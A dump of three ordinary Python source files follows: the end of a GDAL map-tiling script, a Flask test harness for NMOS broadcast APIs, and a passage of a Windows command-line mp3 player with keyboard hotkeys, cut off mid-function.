ct.TransformPoint(east, north)[:2] return south, west, north, east tile_swne = rastertileswne else: tile_swne = lambda x, y, z: (0, 0, 0, 0) # noqa else: tile_swne = lambda x, y, z: (0, 0, 0, 0) # noqa return tile_swne def single_threaded_tiling(input_file, output_folder, options): """ Keep a single threaded version that stays clear of multiprocessing, for platforms that would not support it """ if options.verbose: print("Begin tiles details calc") conf, tile_details = worker_tile_details(input_file, output_folder, options) if options.verbose: print("Tiles details calc complete.") if not options.verbose and not options.quiet: progress_bar = ProgressBar(len(tile_details)) progress_bar.start() for tile_detail in tile_details: create_base_tile(conf, tile_detail) if not options.verbose and not options.quiet: progress_bar.log_progress() if getattr(threadLocal, 'cached_ds', None): del threadLocal.cached_ds create_overview_tiles(conf, output_folder, options) shutil.rmtree(os.path.dirname(conf.src_file)) def multi_threaded_tiling(input_file, output_folder, options): nb_processes = options.nb_processes or 1 # Make sure that all processes do not consume more than GDAL_CACHEMAX os.environ['GDAL_CACHEMAX'] = '%d' % int(gdal.GetCacheMax() / nb_processes) (conf_receiver, conf_sender) = Pipe(False) if options.verbose: print("Begin tiles details calc") p = Process(target=worker_tile_details, args=[input_file, output_folder, options], kwargs={"send_pipe": conf_sender}) p.start() # Make sure to consume the queue before joining. If the payload is too big, it won't be put in # one go in the queue and therefore the sending process will never finish, waiting for space in # the queue to send data conf, tile_details = conf_receiver.recv() p.join() if options.verbose: print("Tiles details calc complete.") # Have to create the Queue through a multiprocessing.Manager to get a Queue Proxy, # otherwise you can't pass it as a param in the method invoked by the pool... manager = Manager() queue = manager.Queue() pool = Pool(processes=nb_processes) # TODO: gbataille - check the confs for which each element is an array... one useless level? # TODO: gbataille - assign an ID to each job for print in verbose mode "ReadRaster Extent ..." for tile_detail in tile_details: pool.apply_async(create_base_tile, (conf, tile_detail), {"queue": queue}) if not options.verbose and not options.quiet: p = Process(target=progress_printer_thread, args=[queue, len(tile_details)]) p.start() pool.close() pool.join() # Jobs finished if not options.verbose and not options.quiet: p.join() # Traces done create_overview_tiles(conf, output_folder, options) shutil.rmtree(os.path.dirname(conf.src_file)) def main(): # TODO: gbataille - use mkdtemp to work in a temp directory # TODO: gbataille - debug intermediate tiles.vrt not produced anymore? # TODO: gbataille - Refactor generate overview tiles to not depend on self variables argv = gdal.GeneralCmdLineProcessor(sys.argv) input_file, output_folder, options = process_args(argv[1:]) nb_processes = options.nb_processes or 1 if nb_processes == 1: single_threaded_tiling(input_file, output_folder, options) else: multi_threaded_tiling(input_file, output_folder, options) if __name__ == '__main__': main() # vim: set tabstop=4 shiftwidth=4 expandtab:
nmos-test.py
# Copyright (C) 2018 Riedel Communications GmbH & Co. KG # # Modifications Copyright 2018 British Broadcasting Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from flask import Flask, render_template, flash, request, make_response from wtforms import Form, validators, StringField, SelectField, SelectMultipleField, IntegerField, HiddenField, FormField, FieldList from Registry import NUM_REGISTRIES, REGISTRIES, REGISTRY_API from GenericTest import NMOSInitException from TestResult import TestStates from Node import NODE, NODE_API from Config import CACHE_PATH, SPECIFICATIONS, ENABLE_DNS_SD, DNS_SD_MODE from DNS import DNS from datetime import datetime, timedelta from junit_xml import TestSuite, TestCase from enum import IntEnum import git import os import json import copy import pickle import threading import sys import platform import argparse import time import IS0401Test import IS0402Test import IS0403Test import IS0501Test import IS0502Test import IS0601Test import IS0701Test import IS0801Test FLASK_APPS = [] DNS_SERVER = None core_app = Flask(__name__) core_app.debug = False core_app.config['SECRET_KEY'] = 'nmos-interop-testing-jtnm' core_app.config['TEST_ACTIVE'] = False core_app.register_blueprint(NODE_API) # Dependency for IS0401Test for instance in range(NUM_REGISTRIES): reg_app = Flask(__name__) reg_app.debug = False reg_app.config['REGISTRY_INSTANCE'] = instance reg_app.register_blueprint(REGISTRY_API) # Dependency for IS0401Test FLASK_APPS.append(reg_app) # Definitions of each set of tests made available from the dropdowns TEST_DEFINITIONS = { "IS-04-01": { "name": "IS-04 Node API", "specs": [{ "spec_key": "is-04", "api_key": "node" }], "class": IS0401Test.IS0401Test }, "IS-04-02": { "name": "IS-04 Registry APIs", "specs": [{ "spec_key": "is-04", "api_key": "registration" }, { "spec_key": "is-04", "api_key": "query" }], "class": IS0402Test.IS0402Test }, "IS-04-03": { "name": "IS-04 Node API (Peer to Peer)", "specs": [{ "spec_key": "is-04", "api_key": "node" }], "class": IS0403Test.IS0403Test }, "IS-05-01": { "name": "IS-05 Connection Management API", "specs": [{ "spec_key": 'is-05', "api_key": "connection" }], "class": IS0501Test.IS0501Test }, "IS-05-02": { "name": "IS-05 Interaction with Node API", "specs": [{ "spec_key": "is-04", "api_key": "node" }, { "spec_key": "is-05", "api_key": "connection" }], "class": IS0502Test.IS0502Test }, "IS-06-01": { "name": "IS-06 Network Control API", "specs": [{ "spec_key": 'is-06', "api_key": "netctrl" }], "class": IS0601Test.IS0601Test }, "IS-07-01": { "name": "IS-07 Event & Tally API", "specs": [{ "spec_key": 'is-07', "api_key": "events" }], "class": IS0701Test.IS0701Test }, "IS-08-01": { "name": "IS-08 Channel Mapping API", "specs": [{ "spec_key": 'is-08', "api_key": "channelmapping" }], "class": IS0801Test.IS0801Test } } def enumerate_tests(class_def): tests = ["all", "auto"] for method_name in dir(class_def): if method_name.startswith("test_"): method = getattr(class_def, method_name) if callable(method): tests.append(method_name) return tests class NonValidatingSelectField(SelectField): def pre_validate(self, form): pass class NonValidatingMultipleSelectField(SelectMultipleField): def pre_validate(self, form): pass class EndpointForm(Form): ip = StringField(label="IP:", validators=[validators.IPAddress(message="Please enter a valid IPv4 address."), validators.optional()]) port = IntegerField(label="Port:", validators=[validators.NumberRange(min=0, max=65535, message="Please enter a valid port number " "(0-65535)."), validators.optional()]) version = NonValidatingSelectField(label="API Version:", choices=[("v1.0", "v1.0"), ("v1.1", "v1.1"), ("v1.2", "v1.2"), ("v1.3", "v1.3")]) class DataForm(Form): # Define the primary test selection dropdown test_choices = [(test_id, TEST_DEFINITIONS[test_id]["name"]) for test_id in TEST_DEFINITIONS] test_choices = sorted(test_choices, key=lambda x: x[0]) test = SelectField(label="Test Suite:", choices=test_choices) # Determine how many sets of IP/Port/Version to display at most specs_per_test = [(test_id, TEST_DEFINITIONS[test_id]["specs"]) for test_id in TEST_DEFINITIONS] specs_per_test = sorted(specs_per_test, key=lambda x: x[0]) max_endpoints = 0 for spec in specs_per_test: if len(spec) > max_endpoints: max_endpoints = len(spec) endpoints = FieldList(FormField(EndpointForm, label=""), min_entries=max_endpoints) # Define the secondary test selection dropdown test_selection = NonValidatingMultipleSelectField(label="Test Selection:", choices=[("all", "all"), ("auto", "auto")]) # Hide test data in the web form for dynamic modification of behaviour test_data = {} for test_id in TEST_DEFINITIONS: test_data[test_id] = copy.deepcopy(TEST_DEFINITIONS[test_id]) test_data[test_id].pop("class") test_data[test_id]["tests"] = enumerate_tests(TEST_DEFINITIONS[test_id]["class"]) hidden_options = HiddenField(default=max_endpoints) hidden_tests = HiddenField(default=json.dumps(test_data)) hidden_specs = HiddenField(default=json.dumps(SPECIFICATIONS)) # Index page @core_app.route('/', methods=["GET", "POST"]) def index_page(): form = DataForm(request.form) if request.method == "POST" and not core_app.config['TEST_ACTIVE']: if form.validate(): test = request.form["test"] try: if test in TEST_DEFINITIONS: test_def = TEST_DEFINITIONS[test] endpoints = [] for index, spec in enumerate(test_def["specs"]): ip = request.form["endpoints-{}-ip".format(index)] port = request.form["endpoints-{}-port".format(index)] version = request.form["endpoints-{}-version".format(index)] endpoints.append({"ip": ip, "port": port, "version": version}) test_selection = request.form.getlist("test_selection") results = run_tests(test, endpoints, test_selection) for index, result in enumerate(results["result"]): results["result"][index] = result.output() r = make_response(render_template("result.html", form=form, url=results["base_url"], test=results["name"], result=results["result"])) r.headers['Cache-Control'] = 'no-cache, no-store' return r else: flash("Error: This test definition does not exist") except Exception as e: flash("Error: {}".format(e)) else: flash("Error: {}".format(form.errors)) elif request.method == "POST": flash("Error: A test is currently in progress. Please wait until it has completed or restart the testing tool.") r = make_response(render_template("index.html", form=form)) r.headers['Cache-Control'] = 'no-cache, no-store' return r def run_tests(test, endpoints, test_selection=["all"]): if test in TEST_DEFINITIONS: test_def = TEST_DEFINITIONS[test] apis = {} for index, spec in enumerate(test_def["specs"]): base_url = "http://{}:{}".format(endpoints[index]["ip"], str(endpoints[index]["port"])) spec_key = spec["spec_key"] api_key = spec["api_key"] apis[api_key] = { "raml": SPECIFICATIONS[spec_key]["apis"][api_key]["raml"], "base_url": base_url, "url": "{}/x-nmos/{}/{}/".format(base_url, api_key, endpoints[index]["version"]), "spec_path": CACHE_PATH + '/' + spec_key, "version": endpoints[index]["version"], "spec": None # Used inside GenericTest } # Instantiate the test class if test == "IS-04-01": # This test has an unusual constructor as it requires a registry instance test_obj = test_def["class"](apis, REGISTRIES, NODE, DNS_SERVER) else: test_obj = test_def["class"](apis) core_app.config['TEST_ACTIVE'] = True try: result = test_obj.run_tests(test_selection) except Exception as ex: print(" * ERROR: {}".format(ex)) raise ex finally: core_app.config['TEST_ACTIVE'] = False return {"result": result, "name": test_def["name"], "base_url": base_url} else: raise NMOSInitException("This test definition does not exist") def init_spec_cache(): print(" * Initialising specification repositories...") if not os.path.exists(CACHE_PATH): os.makedirs(CACHE_PATH) # Prevent re-pulling of the spec repos too frequently time_now = datetime.now() last_pull_file = os.path.join(CACHE_PATH + "/last_pull") last_pull_time = time_now - timedelta(hours=1) update_last_pull = False if os.path.exists(last_pull_file): try: with open(last_pull_file, "rb") as f: last_pull_time = pickle.load(f) except Exception as e: print(" * ERROR: Unable to load last pull time for cache: {}".format(e)) for repo_key, repo_data in SPECIFICATIONS.items(): path = os.path.join(CACHE_PATH + '/' + repo_key) if not os.path.exists(path): print(" * Initialising repository '{}'".format(repo_data["repo"])) repo = git.Repo.clone_from('https://github.com/AMWA-TV/' + repo_data["repo"] + '.git', path) update_last_pull = True else: repo = git.Repo(path) repo.git.reset('--hard') # Only pull if we haven't in the last hour if (last_pull_time + timedelta(hours=1)) <= time_now: print(" * Pulling latest files for repository '{}'".format(repo_data["repo"])) try: repo.remotes.origin.pull() update_last_pull = True except Exception as e: print(" * ERROR: Unable to update repository '{}'. If the problem persists, " "please delete the '{}' directory".format(repo_data["repo"], CACHE_PATH)) if update_last_pull: try: with open(last_pull_file, "wb") as f: pickle.dump(time_now, f) except Exception as e: print(" * ERROR: Unable to write last pull time to file: {}".format(e)) print(" * Initialisation complete") def write_test_results(results, args): exit_code = ExitCodes.OK test_cases = [] for test_result in results["result"]: test_case = TestCase(test_result.name, elapsed_sec=test_result.elapsed_time, timestamp=test_result.timestamp) if test_result.name in args.ignore or test_result.state in [TestStates.DISABLED, TestStates.UNCLEAR, TestStates.MANUAL, TestStates.NA, TestStates.OPTIONAL]: test_case.add_skipped_info(test_result.detail) elif test_result.state in [TestStates.WARNING, TestStates.FAIL]: test_case.add_failure_info(test_result.detail, failure_type=str(test_result.state)) if test_result.state == TestStates.FAIL: exit_code = max(exit_code, ExitCodes.FAIL) elif test_result.state == TestStates.WARNING: exit_code = max(exit_code, ExitCodes.WARNING) elif test_result.state != TestStates.PASS: test_case.add_error_info(test_result.detail, error_type=str(test_result.state)) test_cases.append(test_case) ts = TestSuite(results["name"] + ": " + results["base_url"], test_cases) with open(args.output, "w") as f: TestSuite.to_file(f, [ts], prettyprint=False) print(" * Test results written to file: {}".format(args.output)) return exit_code def print_test_results(results, args): exit_code = ExitCodes.OK print("\r\nPrinting test results for suite '{}' using API '{}'".format(results["name"], results["base_url"])) print("----------------------------") total_time = 0 for test_result in results["result"]: if test_result.state == TestStates.FAIL: exit_code = max(exit_code, ExitCodes.FAIL) elif test_result.state == TestStates.WARNING: exit_code = max(exit_code, ExitCodes.WARNING) result_str = "{} ... {}".format(test_result.name, str(test_result.state)) print(result_str) total_time += test_result.elapsed_time print("----------------------------") print("Ran {} tests in ".format(len(results["result"])) + "{0:.3f}s".format(total_time) + "\r\n") return exit_code def parse_arguments(): parser = argparse.ArgumentParser(description='NMOS Test Suite') parser.add_argument('--suite', default=None, help="select a test suite to run tests from in non-interactive mode") parser.add_argument('--list', action='store_true', help="list available tests for a given suite") parser.add_argument('--selection', default="all", help="select a specific test to run, otherwise 'all' will be tested") parser.add_argument('--ip', default=list(), nargs="*", help="space separated IP addresses of the APIs under test") parser.add_argument('--port', default=list(), nargs="*", type=int, help="space separated ports of the APIs under test") parser.add_argument('--version', default=list(), nargs="*", help="space separated versions of the APIs under test") parser.add_argument('--ignore', default=list(), nargs="*", help="space separated test names to ignore the results from") parser.add_argument('--output', default=None, help="filename to save JUnit XML format test results to, otherwise print to stdout") return parser.parse_args() def validate_args(args): if args.suite: if args.suite not in TEST_DEFINITIONS: print(" * ERROR: The requested test suite '{}' does not exist".format(args.suite)) sys.exit(ExitCodes.ERROR) if args.list: tests = enumerate_tests(TEST_DEFINITIONS[args.suite]["class"]) for test_name in tests: print(test_name) sys.exit(ExitCodes.OK) if args.selection and args.selection not in enumerate_tests(TEST_DEFINITIONS[args.suite]["class"]): print(" * ERROR: Test with name '{}' does not exist in test definition '{}'" .format(args.selection, args.suite)) sys.exit(ExitCodes.ERROR) if len(args.ip) != len(args.port) or len(args.ip) != len(args.version): print(" * ERROR: IPs, ports and versions must contain the same number of elements") sys.exit(ExitCodes.ERROR) if len(args.ip) != len(TEST_DEFINITIONS[args.suite]["specs"]): print(" * ERROR: This test definition expects {} IP(s), port(s) and version(s)" .format(len(TEST_DEFINITIONS[args.suite]["specs"]))) sys.exit(ExitCodes.ERROR) def start_web_servers(): port = 5001 for app in FLASK_APPS: t = threading.Thread(target=app.run, kwargs={'host': '0.0.0.0', 'port': port, 'threaded': True}) t.daemon = True t.start() port += 1 t = threading.Thread(target=core_app.run, kwargs={'host': '0.0.0.0', 'port': 5000, 'threaded': True}) t.daemon = True t.start() def run_noninteractive_tests(args): endpoints = [] for i in range(len(args.ip)): endpoints.append({"ip": args.ip[i], "port": args.port[i], "version": args.version[i]}) try: results = run_tests(args.suite, endpoints, [args.selection]) if args.output: exit_code = write_test_results(results, args) else: exit_code = print_test_results(results, args) except Exception as e: print(" * ERROR: {}".format(str(e))) exit_code = ExitCodes.ERROR return exit_code class ExitCodes(IntEnum): ERROR = -1 # General test suite error OK = 0 # Normal exit condition, or all tests passed in non-interactive mode WARNING = 1 # Worst case test was a warning in non-interactive mode FAIL = 2 # Worst case test was a failure in non-interactive mode if __name__ == '__main__': # Check if we're testing unicast DNS discovery, and if so ensure we have elevated privileges if ENABLE_DNS_SD and DNS_SD_MODE == "unicast": is_admin = False if platform.system() == "Windows": from ctypes import windll if windll.shell32.IsUserAnAdmin(): is_admin = True elif os.geteuid() == 0: is_admin = True if not is_admin: print(" * ERROR: In order to test DNS-SD in unicast mode, the test suite must be run with elevated permissions") sys.exit(ExitCodes.ERROR) # Parse and validate command line arguments args = parse_arguments() validate_args(args) # Download up to date versions of each API specification init_spec_cache() # Start the DNS server if ENABLE_DNS_SD and DNS_SD_MODE == "unicast": DNS_SERVER = DNS() # Start the HTTP servers start_web_servers() exit_code = 0 if not args.suite: # Interactive testing mode. Await user input. try: while True: time.sleep(0.2) except KeyboardInterrupt: pass else: # Non-interactive testing mode. Tests carried out automatically. exit_code = run_noninteractive_tests(args) # Testing complete print(" * Exiting") # Stop the DNS server if DNS_SERVER: DNS_SERVER.stop() # Exit the application with the desired code sys.exit(exit_code)
main.py
import keyboard import time import os from win32gui import GetWindowText, GetForegroundWindow from pygame import mixer import datetime import threading import webbrowser import sys from prettytable import PrettyTable import random #import Finished #os change os.system("Cls") #clears screen os.system("title Geet -cli") #change title #extra commandTable = PrettyTable(["Command", "Info",'Example']) #for hint table rainbow_colors = ['#FF0900', '#FF7F00', ' #FFEF00', '#00F11D', ' #0079FF', ' #A800FF'] #for rainbow colored prints valid_hex = '0123456789ABCDEF'.__contains__ #constrains for printing colors typing_time = 0.05 #typing speed selected = 1 #selected rainbow_loop_after = 2 #rainbow new color after ? loops rainbow_currently_at=0 #global rainbow value #printing Info in the screen home_info_array = ['[Enter]/ Play -- To play previously played song. -- play','F-[Path] -- To enter a new path. -- f-C:/Users/natur/Downloads/Music','Git -- To go to Github Page -- git', 'Mail -- To mail the creator -- mail'] #hints home_about_array = ['A Command line interface mp3 player with many features.','Experimantal project (Created in a day).','Hit [Enter] to play previous played File.', 'Type Dir of music file to play from that file.'] #shown at the home page info_array = ['press [Space] To Play or Pause','Press [<-] [->] (horizontal arrow keys) to control volume.', 'Press [^] [v] (vertical arrow keys) to browse through file and press [Enter] to play', 'Press [L] to loop forever.', 'Press [R] to randomly play song.' , 'Press [E] / [Esc] to Exit.', 'Press [G] to go to Github'] #info shown while playing audio #music data music_path='' #path of going to be played audio music_in_file=[] #all music files name is stored here currently_playing = 'f.mp3' #currently playing audio currently_playing_index = 0 #currently playing audio index with ref to music_in_file[] volume_level= 0.7 #volume of music player music_length = '0:03:19' #music length of currently playing audio #geetdata browse_pointer_position = 0 #where the pointer is with ref to music_in_file[] loop_forever = False #loops the audio forever randomize_music = False # randomize audio is_pause = False #audio paused? notExit = True #does the user want to exit the program #terminal size col = '150' #width lines = '41' #height #logo geet_logo_txt = open('logo.txt','r') #read file geet_logo_split = geet_logo_txt.read().split('\n') #change to array geet_logo_txt.close() #close file #project git page def githubPage(): if GetWindowText(GetForegroundWindow()) == 'Geet -cli': #check window name webbrowser.open_new('https://github.com/sairash/spotify-1975') #open browser #mail the creator def mailME(): if GetWindowText(GetForegroundWindow()) == 'Geet -cli': #check window name webbrowser.open_new('mailto:nation.ance@gmail.com') #open browser #change terminal size def terminal_size(): os.system('mode con: cols='+col+' lines='+lines+'') #change size of terminal return(col,lines) #return value #clean the hex code def clean_hex(data): return ''.join(filter(valid_hex, data.upper())) #better hex code #Print Colors def printC(text, color='#ffffff', end='\n'): hexint = int(clean_hex(color), 16) #get int of hexcode print("\x1B[38;2;{};{};{}m{}\x1B[0m".format(hexint>>16, hexint>>8&0xFF, hexint&0xFF, text),end=end) #prints color in the cmd window #Print Animation def printA(text, end='\n',fore_color='#ffffff',back_color='#000000'): start_typing=False back_hex_int = int(clean_hex(fore_color), 16) #chnage to hex fore_hex_int = int(clean_hex(back_color), 16) #chnage to hex text = text+end #add text with end data for character in text: if character==':': #initaial start_typing = not start_typing #change started value else: if start_typing: #if initiated sys.stdout.write("\x1B[48;2;{};{};{}m\x1B[38;2;{};{};{}m{}\x1B[0m".format(fore_hex_int >> 16, fore_hex_int >> 8 & 0xFF, fore_hex_int & 0xFF, back_hex_int >> 16, back_hex_int >> 8 & 0xFF, back_hex_int & 0xFF, character)) #type characters sys.stdout.flush() time.sleep(typing_time) #wait before printing another characters else: print(' ',end='') #Middle without typing #make animatable def make_animateable(string,center=True): string_to_return = ':'+string+':' #add : to make it animatable if center: #want text at center? return(string_to_return.center(int(console_x))) #adds spaces to make it look like it is in the center else: return(string_to_return) #returns without adding spaces #make a string colorful def print_rainbow_colors_loop(string): global rainbow_currently_at #global value currently_in_function = 0 #change data per function call for letter in string: #per letter string printC(letter, color=rainbow_colors[rainbow_currently_at], end='') #print color #change rainbow color if currently_in_function % 2 == 0: rainbow_currently_at += 1 if rainbow_currently_at % 6 == 0: rainbow_currently_at = 0 currently_in_function += 1 #welcome page input command def take_input_command_home(): global music_in_file, music_path , currently_playing, total_music_in_file #global variables while True: command = input('\033[4mGeet\033[0m: > ').lower() #input command #checking commnd if command == 'hint': for info in home_info_array: #reading hint array all_info = info.split(' -- ') #spliting for data commandTable.add_row(all_info) #adding to the table print(commandTable) #showing table elif command == 'git': printA(make_animateable('Opening browser:',center=False), fore_color='#000000', back_color='#00F11D') #print info with animation githubPage() #show git page elif command == 'mail': printA(make_animateable('Opening browser:',center=False), fore_color='#000000', back_color='#00F11D') #print info with animation mailME() #show mail page elif command == '' or command == 'play': song_data = open('data.txt','r') #opening database xD song_data_split = song_data.read().split('\n') #split the data song_data.close() #closing database to clear memory if len(song_data_split)==0: print('\033[4mGeet\033[0m: > No Data Please Specify a path using p-[Path] command') #if nothing in db ask to give data else: music_path = song_data_split[0] #putting path data to music_path currently_playing = song_data_split[1] #putting currently playing data from database for root, subdirs, files in os.walk(song_data_split[0]): #go through the path to get every audio file for file in files: if os.path.splitext(file)[1].lower() in ('.mp3', '.wav', '.ogg', '.xm', '.mod'): #select only audio file music_in_file.append(file) #audiofile appended to playable list total_music_in_file = len(music_in_file) break #break the loop elif command[0] == 'f': number_of_files = 0 printA(make_animateable('Wait going through files! ',center=False), fore_color='#000000', back_color='#00F11D') #animating info path=command[2:] #getting everything after 2 element for root, subdirs, files in os.walk(path): #go through the path to get every audio file for file in files: if os.path.splitext(file)[1].lower() in ('.mp3', '.wav', '.ogg', '.xm', '.mod'): #select only audio file music_in_file.append(file) #audiofile appended to playable list number_of_files +=1 if number_of_files > 0: first_file = music_in_file[0] #putting the first element in first file to add at currently playing print(path, first_file) #writing data to database song_data = open('data.txt','w') music_path = path song_data.write(path) song_data.write('\n') song_data.write(first_file) song_data.close() currently_playing = first_file #adding to currently playing total_music_in_file = len(music_in_file) #total music in file added break #break the loop else: printA(make_animateable('No Playable Audiofile found. ',center=False), fore_color='#ffffff', back_color='#ff0000') #animating info print('',end='') else: printA(make_animateable('Invalid command: ',center=False), fore_color='#ffffff', back_color='#ff0000') #animating info print('',end='') #welcome page display def main(): os.system("Cls") #clearing screen for line in geet_logo_split: #for everyline in logo print_rainbow_colors_loop(line.center(int(console_x))) #printing logo printA(make_animateable(' Welcome To Spotify-1975 a music player in cmd '), back_color='#FFEF00', fore_color='#000000') #animating info printA(make_animateable(' To play music press the enter or put in the path and hit enter.'), back_color='#FFEF00', fore_color='#000000') #animating info print() print('--------------------------------------------------------------About---------------------------------------------------------------'.center(int(console_x))) for line in home_about_array: #print every line info print(" | "+line+" "*(130-len(line)-3)+"|") print('----------------------------------------------------------------------------------------------------------------------------------'.center(int(console_x))) print() print_rainbow_colors_loop('Creator - Sairash'.center(int(console_x))) #printing rainbow color creator print_rainbow_colors_loop('git: https:/www.github.com/sairash/geet'.center(int(console_x))) #printing git link rainbow print('\033[4mGeet\033[0m: > "Eg: Hint"') # print hint take_input_command_home() #enter command music_play() #initial music play #init play music def music_play(): global music_length_seconds, music_length, currently_playing_index, browse_pointer_position #global variable #music player mixer.init() #starting the mixer print(music_path+currently_playing) mixer.music.load(music_path+'/'+currently_playing) #loading the song a = mixer.Sound(music_path+'/'+currently_playing) #loading the song for its length music_length = str(datetime.timedelta(seconds=int(a.get_length()))) #changing the music length variable music_length_seconds = int(a.get_length()) # Setting the volume mixer.music.set_volume(volume_level) # Start playing the song mixer.music.play() currently_playing_index = music_in_file.index(currently_playing) browse_pointer_position = currently_playing_index #progress bar def progressBar(currently_at,total_length,number_of_dash): currently_at_percent = int(int(currently_at) * 100/ total_length) #percentage of current position should_be_placed_at = int(currently_at_percent/100 * number_of_dash) #percentage of current position with respective to number of dash data_to_return = '' for x in range(number_of_dash): #putting value if x < should_be_placed_at: data_to_return += '=' #placing = for already played elif x > should_be_placed_at: data_to_return += '-' #placing - for remaining music else: data_to_return += '█' # placing cursor return data_to_return #returning string #play selected selected song def play_selected_song(number): global a, music_length, music_length_seconds, currently_playing_index, currently_playing, browse_pointer_position #global variable mixer.music.load(music_path+'/'+music_in_file[number]) #loading the song a = mixer.Sound(music_path+'/'+music_in_file[number]) #loading the song for its length music_length = str(datetime.timedelta(seconds=int(a.get_length()))) #changing the music length variable music_length_seconds = int(a.get_length()) # Setting the volume mixer.music.set_volume(volume_level) # Start playing the song mixer.music.play() currently_playing_index=number currently_playing = music_in_file[currently_playing_index] song_data = open('data.txt','w') # writing new in database song_data.write(music_path) song_data.write('\n') song_data.write(currently_playing) song_data.close() browse_pointer_position= number #changing browser pointer position cli_refresh() #refresh gui #printing cli all music with ... at last def cli_audio_names(audio_name): split_audio_name=audio_name.split('.') #split audio name with . audio_name=split_audio_name[:-1] #audio name is everything except last audio_name = '.'.join(audio_name) #joining audio name extension = split_audio_name[-1] #get extension name file_name = '' if len(audio_name) > 75: file_name = audio_name[:75] + '..' #file name with .. at end else: file_name = audio_name file_name +='.'+extension #adding extension at end return file_name #returning string #check whether to display L or not def get_loop_forever(): if loop_forever: return 'L' else: return ' ' #check whether to display R or not def get_randomize_music(): if randomize_music: return 'R' else: return ' ' #when music finishes what to do? def on_music_finished(): if loop_forever: mixer.music.play() # play the same music again elif randomize_music: play_selected_song(random.randint(1,total_music_in_file-1)) #get random number from 1 to total music data in music_in_file array else: play_next = currently_playing_index+1 #else play next in the list if play_next >= total_music_in_file: play_selected_song(0) else: play_selected_song(play_next) #for exit when [e] or [Esc] is pressed def exit(): if GetWindowText(GetForegroundWindow()) == 'Geet -cli': #check window name global notExit #global variable notExit = False #end thread job #when [Space] is pressed def space(): if GetWindowText(GetForegroundWindow()) == 'Geet -cli': #check window name global is_pause #global varaible if is_pause: mixer.music.unpause() #unpause music is_pause = False #change to opposite else: mixer.music.pause() #pause music is_pause = True #change to opposite cli_refresh() #refresh gui #when [L] is pressed def loop_forever_function(): global loop_forever if GetWindowText(GetForegroundWindow()) == 'Geet -cli': #check window name loop_forever = not(loop_forever) #change to opposite cli_refresh() #refresh gui #when [R] is pressed def randomize_music_function(): global randomize_music if GetWindowText(GetForegroundWindow()) == 'Geet -cli': #check window name randomize_music = not(randomize_music) #change to opposite cli_refresh() #refresh gui #when [^] is pressed def volumeUp(): global volume_level #global value if GetWindowText(GetForegroundWindow()) == 'Geet -cli': #check window name if volume_level < .9: #if less than 1[max] volume_level += .1 #change value mixer.music.set_volume(volume_level) #change volume cli_refresh() #refresh gui def volumeDown(): global volume_level #global value if GetWindowText(GetForegroundWindow()) == 'Geet -cli': #check window name if volume_level > 0: #if greater than 0 [min] volume_level -= .1 #change value mixer.music.set_volume(volume_level) #change volume cli_refresh() #refresh gui def browseUp(): global browse_pointer_position #global value if GetWindowText(GetForegroundWindow()) == 'Geet -cli': #check window name if browse_pointer_position <= 0: #if less than 0 [min] browse_pointer_position = 0 #set position 0 else: #if greater than 0 [min] browse_pointer_position -=1 #set position -1 cli_refresh() #refresh gui def browseDown(): global browse_pointer_position #global value if GetWindowText(GetForegroundWindow()) == 'Geet -cli': #check window name if browse_pointer_position+1 >= total_music_in_file: #if less than total music in array [max] browse_pointer_position = total_music_in_file - 1 #set position total music in array -1 else:#if greater than total music in array [max] browse_pointer_position +=1 #set position +1 cli_refresh() #refresh gui def file_select_enter(): if GetWindowText(GetForegroundWindow()) == 'Geet -cli': #check window name input('Loading... ') #delete enter [important] play_selected_song(browse_pointer_position) #playing music at browse position #gets keypress def initiate_keyborde_logic(): keyboard.add_hotkey('g', githubPage) #detects keypress keyboard.add_hotkey('l', loop_forever_function) #detects keypress keyboard.add_hotkey('r', randomize_music_function) #detects keypress keyboard.add_hotkey('e', exit) #detects keypress keyboard.add_hotkey('esc', exit) #detects keypress keyboard.add_hotkey('space', space) #detects keypress keyboard.add_hotkey('left', volumeDown) #detects keypress keyboard.add_hotkey('right',volumeUp) #detects keypress keyboard.add_hotkey('up', browseUp) #detects keypress keyboard.add_hotkey('down', browseDown) #detects keypress keyboard.add_hotkey('enter', file_select_enter) #detects keypress #display music player gui def cli_refresh(): if str(datetime.timedelta(seconds=int(mixer.music.get_pos()/1000))) == music_length: #check if music finished on_music_finished() #on music finished console_x, console_y=terminal_size() #get and make terminal size #print logo for line in geet_logo_split: print_rainbow_colors_loop(line.center(int(console_x))) #print in rainbow color print_rainbow_colors_loop(datetime.datetime.now().strftime("%H:%M:%S").center(int(console_x))) #print clock in rainbow colors print() print('---------------------------------------------------------------Open---------------------------------------------------------------'.center(int(console_x))) #print all music and select if(browse_pointer_position+10 >= total_music_in_file): #for ending for music in range(total_music_in_file-10,total_music_in_file): if music == browse_pointer_position: file_name = cli_audio_names(music_in_file[music]+' <') #if index is same as browse pointer position else: file_name = cli_audio_names(music_in_file[music]) #if index is not same if music_in_file[music] == currently_playing: #if index of music in array is same as currently playing print(" | ",end='') printC(file_name,color='#ffff00',end='') printC(" "*(130-len(file_name)-3),color='#ff0000',end='') print("|") else: print(" | "+file_name+" "*(130-len(file_name)-3)+"|") #if not same as currently playing else: for music in range(browse_pointer_position,browse_pointer_position+10): #not for ending if music == browse_pointer_position: file_name = cli_audio_names(music_in_file[music]+' <') #if index is same as browse pointer position else: file_name = cli_audio_names(music_in_file[music]) #if index is not same if music_in_file[music] == currently_playing: #if index of music in array is same as currently playing print(" | ",end='') printC(file_name,color='#ffff00',end='') printC(" "*(130-len(file_name)-3),color='#ff0000',end='') print("|") else: print(" | "+file_name+" "*(130-len(file_name)-3)+"|") #if not same as currently playing print('----------------------------------------------------------------------------------------------------------------------------------'.center(int(console_x))) print('--------------------------------------------------------------Lyrics--------------------------------------------------------------'.center(int(console_x))) lyrics_comming_soon='Lyrics Comming Soon' print(" | "+lyrics_comming_soon+" "*(130-len(lyrics_comming_soon)-3)+"|") #lyrics display area for music in range(4): file_name = '' print(" | "+file_name+" "*(130-len(file_name)-3)+"|") print('----------------------------------------------------------------------------------------------------------------------------------'.center(int(console_x))) print('---------------------------------------------------------------Info---------------------------------------------------------------'.center(int(console_x))) for info in info_array: print(" | "+info+" "*(130-len(info)-3)+"|") print('----------------------------------------------------------------------------------------------------------------------------------'.center(int(console_x))) print() print_rainbow_colors_loop('Creator - Sairash'.center(int(console_x))) 